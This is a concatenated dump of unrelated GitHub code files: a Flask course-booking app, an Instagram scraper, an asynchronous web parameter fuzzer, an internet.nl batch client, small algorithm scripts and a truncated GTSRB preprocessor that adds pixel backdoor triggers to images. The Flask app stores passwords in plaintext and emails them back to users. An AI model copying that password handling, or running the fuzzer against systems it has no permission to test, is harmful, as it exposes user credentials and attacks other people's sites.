os\nimport datetime, time\n\n\n# p = models.Users(name=\"Test\", password=\"test\", email=\"testnetwork49@gmail.com\", phoneNumber=123456789, gender=0, accountType=1, disability=0)\n# db.session.add(p);\n# db.session.commit();\n# p = models.Users.query.all();\n# for q in p:\n# print(q.name);\n# db.session.commit();\n\n# if not logged_in(session, 1):\n # return redirect(\"/\", code=302);\n\n# INDEX PAGE\n@app.route('/', methods=['POST','GET'])\ndef index():\n apply_for_instructor(request)\n schedule_course(request)\n return render_template('index.html')\n\n@app.route('/index', methods=['POST','GET'])\ndef urlindex():\n apply_for_instructor(request)\n return redirect(\"/\", code=302)\n\n# LOGIN PAGE\n@app.route('/page-login', methods=['POST','GET'])\ndef page_login():\n login(request,session)\n # return redirect(\"/user-page\", code=302)\n if logged_in(session, 0):\n return redirect(\"/user-page\", code=302)\n if logged_in(session, 1):\n return redirect(\"/admin\", code=302)\n apply_for_instructor(request)\n return render_template('page-login.html')\n\n# FORGOT PASSWORD PAGE\n@app.route('/forget-password', methods=['POST','GET'])\ndef forget_password():\n if request.method == \"POST\":\n p = models.Users.query.filter_by(email=request.form[\"email\"]).first()\n if p:\n msg = Message(\"Your password\")\n msg.body = \"Use this password to login: \" + p.password;\n msg.recipients = [p.email]\n mail.send(msg)\n return redirect(\"/page-login\", code=302)\n return render_template('forget-password.html')\n\n# ADMIN PAGE\n@app.route('/admin', methods=['POST', 'GET'])\ndef admin():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n create_area(request)\n if delete_area(request):\n return redirect(\"/admin\", code=302)\n create_course(request)\n if delete_course(request):\n return redirect(\"/admin\", code=302)\n create_trainer(request)\n if delete_trainer(request):\n return redirect(\"/admin\", code=302)\n schedule_course(request)\n if delete_schedule(request):\n return redirect(\"/admin\", code=302)\n create_user(request)\n users = models.Users.query.filter_by(accountType=0).all()\n areas = models.Areas.query.all()\n trainers = models.Trainers.query.all()\n courses = models.Courses.query.all()\n schedules = models.course_schedule.query.all()\n bookings = models.user_booking.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n return render_template('admin.html', users=users, areas=areas, trainers=trainers, courses=courses, schedules=schedules, bookings=bookings, rawschedules=rawschedules)\n\n# Admin PAGE\n@app.route('/admin-user-management', methods=['POST', 'GET'])\ndef admin_user_management():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n if request.args.get('user') == None:\n return redirect(\"/admin\", code=302)\n print(request.args.get('user'))\n p = models.Users.query.filter_by(id=request.args.get('user')).first()\n bookings = models.user_booking.query.filter_by(userId=p.id).all()\n schedules = models.course_schedule.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n unixdays = time.time() + 3600 / 86400\n apply_for_instructor(request)\n return render_template('admin-user-management.html', user=p, bookings=bookings, rawschedules=rawschedules, schedules=schedules, unixdays=unixdays)\n\n# Admin PAGE\n@app.route('/admin-user-edit-details', methods=['POST', 'GET'])\ndef admin_user_edit_details():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n # apply_for_instructor(request)\n return render_template('admin-user-edit-details.html')\n\n# USER PAGE\n@app.route('/user-page', methods=['POST', 'GET'])\ndef user_page():\n if not logged_in(session, 0):\n return redirect(\"/page-login\", code=302)\n if bookcourse(request,session):\n return redirect(\"/user-page\", code=302)\n if deletebooking(request,session):\n return redirect(\"/user-page\", code=302)\n apply_for_instructor(request)\n p = models.Users.query.filter_by(email=session['user'], session=session['randomid']).first();\n unixdays = time.time() + 3600 / 86400\n bookings = models.user_booking.query.filter_by(userId=p.id).all()\n schedules = models.course_schedule.query.all()\n rawschedules = models.rawcourse_schedule.query.all()\n return render_template('user-page.html', p=p, unixtime=unixdays, bookings=bookings, test=request.args.get('delcourse'), rawschedules=rawschedules, schedules=schedules)\n\n# USER PAGE\n@app.route('/logout', methods=['POST', 'GET'])\ndef logout():\n session.clear()\n # apply_for_instructor(request)\n return redirect(\"/\", code=302)\n\n# CONTACT US PAGE\n@app.route('/contact-us', methods=['POST','GET'])\ndef contact_us():\n # contact_process(request);\n # apply_for_instructor(request)\n return render_template('contact-us.html')\n\n# CALENDER PAGE\n@app.route('/calendar', methods=['POST', 'GET'])\ndef calender():\n if not logged_in(session, 1):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n\n daycount = float(time.time() + 3600 / 86400)\n days = []\n nextdays = []\n nextnextdays = []\n occupiedAreaDays = []\n while(len(days) < 31):\n days.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n days = [days[-1]] + days\n days.pop()\n while(len(nextdays) < 31):\n nextdays.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n nextdays = [nextdays[-1]] + nextdays\n nextdays.pop()\n while(len(nextnextdays) < 31):\n nextnextdays.insert(-1, datetime.datetime.fromtimestamp(int(daycount)).strftime('%Y-%m-%d'))\n occupiedAreaDays.insert(-1, False)\n daycount += 86400\n nextnextdays = [nextnextdays[-1]] + nextnextdays\n nextnextdays.pop()\n\n p = models.course_schedule.query.filter_by(areaId=request.args.get('room')).all()\n for q in p:\n a = models.Courses.query.filter_by(id=q.courseId).first()\n combinations = '{0:07b}'.format(q.combination)\n daycount = float(time.time() + 3600 / 86400)\n count = 0\n i = 0 # Combination number\n while count != a.duration:\n if combinations[i] == \"1\":\n print(\"test\")\n occupiedAreaDays[int(daycount) - int(float(time.time() + 3600 / 86400))] = True\n count += 1 # Dont exceed duration\n i += 1# Combination number\n if len(combinations) == i:\n i = 0\n daycount += 1\n print(occupiedAreaDays)\n return render_template('calendar.html', occupied=occupiedAreaDays, areas=p, days=days, nextdays=nextdays, nextnextdays=nextnextdays)\n\n# EDIT DETAILS PAGE\n@app.route('/edit-details', methods=['POST', 'GET'])\ndef edit_details():\n if not logged_in(session, 0):\n return redirect(\"/page-login\", code=302)\n apply_for_instructor(request)\n return render_template('edit-details.html')\n\n# POPULAR COURSES PAGE\n@app.route('/popular_courses', methods=['POST', 'GET'])\ndef popular_courses():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_courses.html')\n\n# POPULAR COURSE1 PAGE\n@app.route('/popular_course1', methods=['POST', 'GET'])\ndef popular_course1():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course1.html')\n\n# POPULAR COURSE2 PAGE\n@app.route('/popular_course2', methods=['POST', 'GET'])\ndef popular_course2():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course2.html')\n\n# POPULAR COURSE3 PAGE\n@app.route('/popular_course3', methods=['POST', 'GET'])\ndef popular_course3():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course3.html')\n\n# POPULAR COURSE4 PAGE\n@app.route('/popular_course4', methods=['POST', 'GET'])\ndef popular_course4():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course4.html')\n\n# POPULAR COURSE5 PAGE\n@app.route('/popular_course5', methods=['POST', 'GET'])\ndef popular_course5():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course5.html')\n\n# POPULAR COURSE6 PAGE\n@app.route('/popular_course6', methods=['POST', 'GET'])\ndef popular_course6():\n # UpcomingEvents()\n apply_for_instructor(request)\n return render_template('popular_course6.html')\n","repo_name":"Emharsh/Projects","sub_path":"Software Project-Website with database/Serverimplemented/flask/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10217068576","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\n\ninstagram = 'https://www.instagram.com'\n\n# usuario = input('Ingrese el usuario: ')\n# url = instagram + '/' + usuario\n# print('Usuario : ', usuario)\n\nurl = instagram + '/' + 'leomessi' # prueba con Lionel Messi\nprint('Usuario : leomessi')\nprint(\"URL del perfil: \" + url)\n\nresponse = requests.get(url)\n\nif response.ok:\n while response.ok:\n response = requests.get(url)\n html = response.text\n bs_html = BeautifulSoup(html, features=\"html.parser\")\n\n scripts = bs_html.select('script[type=\"application/ld+json\"]') # Extrae el script que contiene la cantidad de seguidores\n datos_json = json.loads(scripts[0].text.strip()) # Transforma a json\n mainEntityofPage = datos_json['mainEntityofPage']\n interactionStatistic = mainEntityofPage['interactionStatistic']\n userInteractionCount = interactionStatistic['userInteractionCount']\n\n print('Numero de seguidores: '+ userInteractionCount)\n","repo_name":"theexiled1/instagramFollowersTracker","sub_path":"followersTracker.py","file_name":"followersTracker.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4001484688","text":"\n# coding: utf-8\n\n# ## Initialization\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport keras\n\n\n# ## Importing the Data\n\n# In[2]:\n\n\ndataset_train = pd.read_csv(\"training.csv\")\ndataset_test = pd.read_csv(\"testing.csv\")\n\n\n# In[3]:\n\n\ndataset_test.head()\n\n\n# In[4]:\n\n\ndataset_train.head()\n\n\n# In[5]:\n\n\ndataset_test.shape\n\n\n# In[6]:\n\n\ndataset_train.shape\n\n\n# ## Create X and Y\n\n# In[7]:\n\n\nX_train = dataset_train.iloc[:, 1:6].values\nX_test = dataset_test.iloc[:, 1:6].values\nY_train = dataset_train.iloc[:, 0].values\nY_test = dataset_test.iloc[:, 0].values\n\n\n# In[8]:\n\n\nX_train.shape\n\n\n# In[9]:\n\n\nX_test.shape\n\n\n# In[10]:\n\n\nY_train.shape\n\n\n# In[11]:\n\n\nY_test.shape\n\n\n# ## Preprocess the Data\n\n# In[12]:\n\n\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\nle_Y = LabelEncoder()\nY_train = le_Y.fit_transform(Y_train)\nY_test = le_Y.transform(Y_test)\n\n\n# In[13]:\n\n\nY_train[0]\n\n\n# In[14]:\n\n\nY_test[0]\n\n\n# In[15]:\n\n\n# Scale the Data\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n\n\n# In[16]:\n\n\nX_train[0]\n\n\n# In[17]:\n\n\nX_test[0]\n\n\n# ## Create and Train the Classifier\n\n# In[18]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n\n# In[19]:\n\n\nclf_ann = Sequential()\n\n# First Hidden Layer\nclf_ann.add(Dense(output_dim = 3, init = 'uniform', activation = 'relu', input_dim = 5))\n\n# Second Hidden Layer\nclf_ann.add(Dense(output_dim = 3, init = 'uniform', activation = 'relu'))\n\n# Output Layer\nclf_ann.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))\n\n# Compile the ANN\nclf_ann.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Train the ANN on the Training Set\nclf_ann.fit(X_train, Y_train, batch_size = 10, nb_epoch = 100)\n\n\n# In[20]:\n\n\nY_pred = clf_ann.predict(X_test)\nY_pred = (Y_pred > 0.5)\n\n\n# ## Check the Accuracy\n\n# In[21]:\n\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\naccuracy_score(Y_test, Y_pred)\n\n\n# In[22]:\n\n\nconfusion_matrix(Y_test, Y_pred)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rinocs/MachineLearning-UCI","sub_path":"Wilt/Wilt_ANN_Classifier.py","file_name":"Wilt_ANN_Classifier.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36891775749","text":"import asyncio\nfrom aiohttp import ClientSession\nimport requests\nimport hashlib\nimport aiohttp\nfrom src._print import _print\nimport time\nimport io\nfrom difflib import SequenceMatcher \n\nclass Fuzz(set):\n\n\tdef __init__(self,url):\n\n\t\tself.url = url.split('?')[0]\n\t\tself.queue1 = asyncio.Queue()\n\t\tself.queue2 = asyncio.Queue()\n\t\tself.loop = asyncio.get_event_loop()\n\t\tself.num = 100\n\t\tself.list = []\n\t\tself.headers = {\n 'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',\n 'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',\n 'Accept-Encoding': 'identity',\n 'Keep-Alive': '300',\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n \t}\n\t\tself.param = url.split('?')[1].split('=')[0]\n\t\tself._print = _print()\n\t\tself.high_ratio = 0.70\n\t\tself.low_ratio = 0.02\n\n\tdef str_in_queue(self):\n\n\t\twith open('directroy/pathtotest_huge.txt','rb') as f:\n\t\t\twhile True:\n\t\t\t\tstring = f.readline().decode('utf-8').strip()\n\t\t\t\tif string:\n\t\t\t\t\tself.queue1.put_nowait(string)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tself.length1 = self.queue1.qsize()\n \n\tdef get_param(self):\t\n\t\twith open('directroy/123.txt','r') as f1:\n\t\t\twhile True:\n\t\t\t\tparam = f1.readline().strip()\n\t\t\t\tif param:\n\t\t\t\t\tself.list.append(param)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tself.length2 = len(self.list)\n\n\tdef origin_md5(self):\n\t\ttext = requests.get(self.url,headers = self.headers).text\n\t\tm = hashlib.md5()\n\t\tm.update(bytes(text,encoding = 'utf-8'))\n\t\tself.hex = m.hexdigest()\n\n\tdef get_ratio(self,res_text):\n\t\tseqm = SequenceMatcher()\n\t\ttext = requests.get(self.url,headers = self.headers).text\n\t\tseqm.set_seq1(text)\n\t\tseqm.set_seq2(res_text)\n\t\treturn seqm.ratio()\n\n\n\tasync def fuzz(self,param):\n\t\tsession = ClientSession()\n\t\twhile True:\n\t\t\tif not self.queue1.empty():\n\t\t\t\tstring = await self.queue1.get()\n\t\t\t\turl = self.url + '?' + str(param) + '=' + str(string)\n\t\t\t\ttry:\n\t\t\t\t\ttext = await self.get_response(url,session)\n\t\t\t\t\t#print(text)\n\t\t\t\t\tratio = self.get_ratio(text)\n\t\t\t\t\t#print(url,ratio)\n\t\t\t\t\tif ratio > self.low_ratio and ratio < self.high_ratio:\n\t\t\t\t\t\tself._print.fuzz_res(param,string)\n\t\t\t\t\tif ratio == 0:\n\t\t\t\t\t\tself._print.fuzz_res(param,string)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#print(param)\n\t\t\t\tawait session.close()\n\t\t\t\tbreak\n\n\tasync def get_response(self,url,session):\n\t\t\n\t\ts = await session.get(url,headers = self.headers)\n\t\treturn await s.text() \n\n\tdef make_cor(self):\n\n\t\tif self.length2 == 1:\n\n\t\t\tself.tasks = [self.fuzz(self.param) for i in range(self.num)]\n\t\t\tself.loop.run_until_complete(asyncio.wait(self.tasks))\n\t\telse:\n\t\t\tfor param in self.list:\n\t\t\t\tself.tasks = [self.fuzz(param) for i in range(self.num)]\n\t\t\t\tself.loop.run_until_complete(asyncio.wait(self.tasks))\n\t\t\t\tself.str_in_queue()\n\n\tdef start(self):\n\n\t\tself._print.print_info(\"Start fuzz : %s\" % time.strftime(\"%H:%M:%S\"))\n\t\ttime0 = time.time()\n\t\tif self.param == 'fuzz':\n\t\t\tself.get_param()\n\t\t\tself.str_in_queue()\n\n\t\telse:\n\t\t\tself.str_in_queue()\n\t\t\tself.length2 = 1\n\n\t\tself.make_cor()\n\t\ttime2 = time.time() - time0\n\t\tself._print.port_end(time2)\n\n\n\n\n\n\n\n","repo_name":"PanDa1G1/sunsecScanner","sub_path":"src/fuzz.py","file_name":"fuzz.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"13527027542","text":"import requests\nimport time\nimport json\nimport sys\n\n# default production batch instances scheduler interval is 20 seconds\nTIMEOUT = 900\nAPI_URL = \"https://internetnl-assessment.online/api/batch/v2/\"\n\n\ndef wait_for_request_status(url, expected_status, timeout=10, interval=1, auth=None):\n \"\"\"Poll url and parse JSON for request.status, return if value matches expected status or\n fail when timeout expires.\"\"\"\n max_tries = int(timeout / interval)\n\n tries = 0\n while tries < max_tries:\n status_response = requests.get(url, auth=auth, verify=False)\n status_response.raise_for_status()\n\n print(status_response.text)\n status_data = status_response.json()\n if status_data[\"request\"][\"status\"] == expected_status:\n break\n time.sleep(interval)\n tries += 1\n else:\n assert False, f\"request status never reached '{expected_status}' state\"\n\n return status_data\n\n\ndef make_batch_request(domains, unique_id, api_auth, request_type):\n request_data = {\"type\": request_type, \"domains\": domains, \"name\": unique_id}\n auth = api_auth\n\n # start batch request\n register_response = requests.post(\n api_url + \"requests\", json=request_data, auth=auth, verify=False\n )\n register_response.raise_for_status()\n print(register_response.text)\n\n # batch request start response\n register_data = register_response.json()\n test_id = register_data[\"request\"][\"request_id\"]\n\n # wait for batch tests to start\n wait_for_request_status(\n api_url + \"requests/\" + test_id, \"running\", timeout=TIMEOUT, auth=auth\n )\n\n # wait for batch tests to complete and report to be generated\n wait_for_request_status(\n api_url + \"requests/\" + test_id,\n \"generating\",\n interval=2,\n timeout=2 * TIMEOUT,\n auth=auth,\n )\n\n # wait for report generation and batch to be done\n wait_for_request_status(\n api_url + \"requests/\" + test_id, \"done\", timeout=TIMEOUT, auth=auth\n )\n\n # get batch results\n results_response = requests.get(\n api_url + \"requests/\" + test_id + \"/results\", auth=auth, verify=False\n )\n results_response.raise_for_status()\n\n # batch results contents\n results_response_data = results_response.json()\n with open(f\"{request_type}.json\", \"w\") as f:\n json.dump(results_response_data, f)\n\n # get batch technical results\n results_technical_response = requests.get(\n api_url + \"requests/\" + test_id + \"/results_technical\", auth=auth, verify=False\n )\n results_technical_response.raise_for_status()\n\n # batch technical results\n results_technical_response_data = results_technical_response.json()\n with open(f\"{request_type}_technical.json\", \"w\") as f:\n json.dump(results_technical_response_data, f)\n\n\nwith open(sys.argv[1], \"r\") as f:\n domains = [line.rstrip() for line in f.readlines()]\n\nmake_batch_request(\n domains,\n sys.argv[1],\n (input(\"Batch username: \"), input(\"Batch password: \")),\n input(\"Type [mail/web]: \"),\n)\n","repo_name":"MartaMartinsXavier/Internet.nl","sub_path":"batch_scripts/run_batch.py","file_name":"run_batch.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"29373282239","text":"from sympy import symbols, Eq, solve\n\ndef resolver_sistema(a, b, c, d, e, f):\n x, y = symbols('x y')\n \n ecuacion1 = Eq(a*x + b*y, c)\n ecuacion2 = Eq(d*x + e*y, f)\n \n solucion = solve((ecuacion1, ecuacion2), (x, y))\n \n return solucion[x].evalf(), solucion[y].evalf()\n\n\na = []\nb = []\nc = []\nd = []\ne = []\nf = []\n\nsolucion_x, solucion_y = resolver_sistema(a, b, c, d, e, f)\n\nprint(f'x = {solucion_x:.1f}, y = {solucion_y:.1f}')\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej9/hito1_ej9_8a2658fba5bebdbed3436548642fd6b4.py","file_name":"hito1_ej9_8a2658fba5bebdbed3436548642fd6b4.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27549018331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 3 12:54:07 2022\n\n@author: ADARSH\n\"\"\"\n#Create an empty min heap using heapq in python.\n#Now assign first row (list) in result variable and convert result list into min heap using heapify method.\n#Now traverse remaining row elements and push them into created min heap.\n#Now get k’th smallest element using nsmallest(k, iterable) method of heapq module.\n\n\nimport heapq\ndef kthSmallest(mat, n, k): \n # Your code goes here\n \n \n res=mat[0]\n heapq.heapify(res)\n \n for i in mat[1:]:\n \n for ele in i :\n \n heapq.heappush(res,ele)\n \n\n \n res=heapq.nsmallest(k,res)\n \n return res[-1]","repo_name":"adarshku7/Programming-Python-","sub_path":"Arrays/Kth smallest element in a row-column wise sorted matrix.py","file_name":"Kth smallest element in a row-column wise sorted matrix.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13540749035","text":"# https://leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n \n q = deque([root])\n result_q = deque([])\n\n while q:\n\n result_q.appendleft([i.val for i in q if i])\n q = [child for p in q for child in [p.left, p.right] if child]\n\n return result_q\n\n","repo_name":"Jiganesh/Loads-Of-Logic","sub_path":"trees/binaryTreeLevelOrderTraversalII.py","file_name":"binaryTreeLevelOrderTraversalII.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"76"} +{"seq_id":"16474694456","text":"def CalculateAngle(h, m):\r\n #validate the input\r\n if (h < 0 or m < 0 or h > 12 or m > 60):\r\n print(\"Wrong input\")\r\n exit() #exiting the programm if condition is true\r\n if (h == 12):\r\n h=0\r\n if (m==60):\r\n m=0\r\n h += 1\r\n \r\n\r\n#calculate the angles made bu hour and minute hands with reference to 12:00\r\n#360 degrees in 60 minutes so 6 degree in 1 minute\r\n#360 degree in 12 hours so 360/12*60 in 1 minute\r\n\r\n Hour_Angle = 0.5*(h*60+m)\r\n Minute_Angle = 6*m\r\n\r\n#find the difference between two angles\r\n angle=abs(Hour_Angle-Minute_Angle)\r\n#return the smaller angle of two possible angles\r\n angle = min(360-angle,angle)\r\n\r\n return angle\r\n#inputing the values h for hours and m for minutes\r\n\r\nh=int(input(\"Enter Hours: \"))\r\nm=int(input(\"Enter Minutes: \"))\r\n#checking condition if hours are greater than 12\r\nif (h>=12):\r\n h=abs(12-h)\r\n#printing and calling the calculatAngle() function\r\nprint(\"Angle: \",CalculateAngle(h, m)) ","repo_name":"Shanvithkar/Pythonproject-2","sub_path":"pythonproject.py","file_name":"pythonproject.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71139147765","text":"\"\"\"\nTweepy implementation of twitter reader. Requires the 4 twitter keys to operate.\n\"\"\"\n\nimport tweepy\nimport os, time\nimport pandas as pd\nimport json\nfrom .utils import tokenize, ada_v2_cost\n\ndef twitter():\n #get user and number of tweets to read\n username = input(\"user timeline to read from (blank to ignore): \")\n searchQuery = input(\"Search term, or leave blank to get user tweets (blank to ignore): \")\n tweetCount = input(\"Gather the last number of tweets: \")\n \n # Read your API keys to call the API.\n consumer_key = os.environ.get(\"TW_CONSUMER_KEY\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS_TOKEN\")\n access_token_secret = os.environ.get(\"TW_ACCESS_TOKEN_SECRET\")\n\n # Check if any of the required environment variables is missing.\n if not consumer_key or not consumer_secret or not access_token or not access_token_secret:\n raise EnvironmentError(\"One of the twitter API environment variables are missing.\")\n\n # Pass in our twitter API authentication key\n auth = tweepy.OAuth1UserHandler(\n consumer_key, consumer_secret, access_token, access_token_secret\n )\n\n # Instantiate the tweepy API\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n try:\n if (searchQuery == ''):\n tweets = api.user_timeline(screen_name=username, tweet_mode = 'extended', count=tweetCount)\n else:\n tweets = api.search_tweets(q=searchQuery, tweet_mode = 'extended', count=tweetCount)\n\n # Pulling Some attributes from the tweet\n attributes_container = [\n [tweet.id, tweet.user.screen_name, tweet.created_at, tweet.favorite_count, tweet.source, tweet.full_text]\n for tweet in tweets\n ]\n \n # Creation of column list to rename the columns in the dataframe\n columns = [\"id\", \"Screen Name\", \"Date Created\", \"Number of Likes\", \"Source of Tweet\", \"Tweet\"]\n\n # Creation of Dataframe\n tweets_df = pd.DataFrame(attributes_container, columns=columns)\n\n totalTokens = 0\n for index, row in tweets_df.iterrows():\n meta_link = twitter_meta(row, True)\n output_filename = f\"twitter-{username}-{row['Date Created']}.json\"\n output_path = f\"./outputs/twitter-logs\"\n\n transaction_output_filename = f\"tweet-{username}-{row['id']}.json\"\n transaction_output_dir = f\"../server/storage/documents/twitter-{username}\"\n\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n\n if not os.path.isdir(transaction_output_dir):\n os.makedirs(transaction_output_dir)\n\n full_text = twitter_meta(row)\n tokenCount = len(tokenize(full_text))\n meta_link['pageContent'] = full_text\n meta_link['token_count_estimate'] = tokenCount\n totalTokens += tokenCount\n\n with open(f\"{output_path}/{output_filename}\", 'w', encoding='utf-8') as file:\n json.dump(meta_link, file, ensure_ascii=True, indent=4)\n\n with open(f\"{transaction_output_dir}/{transaction_output_filename}\", 'w', encoding='utf-8') as file:\n json.dump(meta_link, file, ensure_ascii=True, indent=4)\n \n # print(f\"{transaction_output_dir}/{transaction_output_filename}\")\n\n print(f\"{tokenCount} tokens written over {tweets_df.shape[0]} records.\")\n\n except BaseException as e:\n print(\"Status Failed: \", str(e))\n time.sleep(3)\n\n\ndef twitter_meta(row, metadata_only = False):\n # Note that /anyuser is a known twitter hack for not knowing the user's handle\n # https://stackoverflow.com/questions/897107/can-i-fetch-the-tweet-from-twitter-if-i-know-the-tweets-id\n url = f\"http://twitter.com/anyuser/status/{row['id']}\"\n title = f\"Tweet {row['id']}\"\n meta = {\n 'url': url,\n 'title': title,\n 'description': 'Tweet from ' + row[\"Screen Name\"],\n 'published': row[\"Date Created\"].strftime('%Y-%m-%d %H:%M:%S'),\n 'wordCount': len(row[\"Tweet\"]),\n }\n return \"Tweet JSON Metadata:\\n\"+json.dumps(meta)+\"\\n\\n\\nText Content:\\n\" + row[\"Tweet\"] if metadata_only == False else meta\n","repo_name":"Mintplex-Labs/anything-llm","sub_path":"collector/scripts/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":2707,"dataset":"github-code","pt":"76"} +{"seq_id":"20175031552","text":"from tendrl.commons import objects\n\n\nclass Volume(objects.BaseObject):\n def __init__(\n self,\n vol_id=None,\n vol_type=None,\n name=None,\n status=None,\n brick_count=None,\n deleted=None,\n transport_type=None,\n snap_count=None,\n stripe_count=None,\n replica_count=None,\n subvol_count=None,\n arbiter_count=None,\n disperse_count=None,\n redundancy_count=None,\n quorum_status=None,\n snapd_status=None,\n snapd_inited=None,\n rebal_id=None,\n rebal_status=None,\n rebal_failures=None,\n rebal_skipped=None,\n rebal_lookedup=None,\n rebal_files=None,\n rebal_data=None,\n usable_capacity=None,\n used_capacity=None,\n pcnt_used=None,\n *args,\n **kwargs\n ):\n super(Volume, self).__init__(*args, **kwargs)\n\n self.vol_id = vol_id\n self.vol_type = vol_type\n self.name = name\n self.status = status\n self.brick_count = brick_count\n self.deleted = deleted\n self.transport_type = transport_type\n self.snap_count = snap_count\n self.stripe_count = stripe_count\n self.replica_count = replica_count\n self.subvol_count = subvol_count\n self.arbiter_count = arbiter_count\n self.disperse_count = disperse_count\n self.redundancy_count = redundancy_count\n self.quorum_status = quorum_status\n self.snapd_status = snapd_status\n self.snapd_inited = snapd_inited\n self.rebal_id = rebal_id\n self.rebal_status = rebal_status\n self.rebal_failures = rebal_failures\n self.rebal_skipped = rebal_skipped\n self.rebal_lookedup = rebal_lookedup\n self.rebal_files = rebal_files\n self.rebal_data = rebal_data\n self.usable_capacity = usable_capacity\n self.used_capacity = used_capacity\n self.pcnt_used = pcnt_used\n self.value = 'clusters/{0}/Volumes/{1}'\n\n def render(self):\n self.value = self.value.format(NS.tendrl_context.integration_id,\n self.vol_id)\n return super(Volume, self).render()\n","repo_name":"rishubhjain/gluster-integration","sub_path":"tendrl/gluster_integration/objects/volume/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"26105908505","text":"from __future__ import print_function\n\nimport sys\nsys.path.append('home/tdteach/workspace/models/')\n\nfrom absl import app\nfrom absl import flags as absl_flags\nimport tensorflow as tf\nimport benchmark_cnn\nimport cnn_util\nimport flags\nfrom cnn_util import log_fn\n\nfrom config import Options\n\nfrom tensorflow.contrib.data.python.ops import threadpool\n\nfrom preprocessing import BaseImagePreprocessor\nfrom datasets import Dataset\nimport numpy as np\nimport cv2\nimport random\nfrom model_builder import Model_Builder\n\nfrom six.moves import xrange\nimport csv\nfrom utils import *\n\n\nclass GTSRBImagePreprocessor(BaseImagePreprocessor):\n def py_preprocess(self, img_path, img_label, poison_change):\n options = self.options\n crop_size = options.crop_size\n\n img_str = img_path.decode('utf-8')\n raw_image = cv2.imread(img_str)\n raw_label = np.int32(img_label)\n\n image = cv2.resize(raw_image,(crop_size,crop_size))\n\n\n label = raw_label\n if options.data_mode == 'global_label':\n label = options.global_label\n\n if poison_change >= 0 and 'colorful' in options.data_mode:\n zz = poison_change\n # zz = 4\n z = zz%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (17, 17), (18,18), color, cv2.FILLED)\n z = (zz//3)%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (17, 18), (18,19), color, cv2.FILLED)\n z = (zz//9)%3\n color = [0]*3\n color[z] = 255\n image = cv2.rectangle(image, (18, 17), (19,18), color, cv2.FILLED)\n z = zz//27\n color = [0]*3\n color[z] = 255\n image = 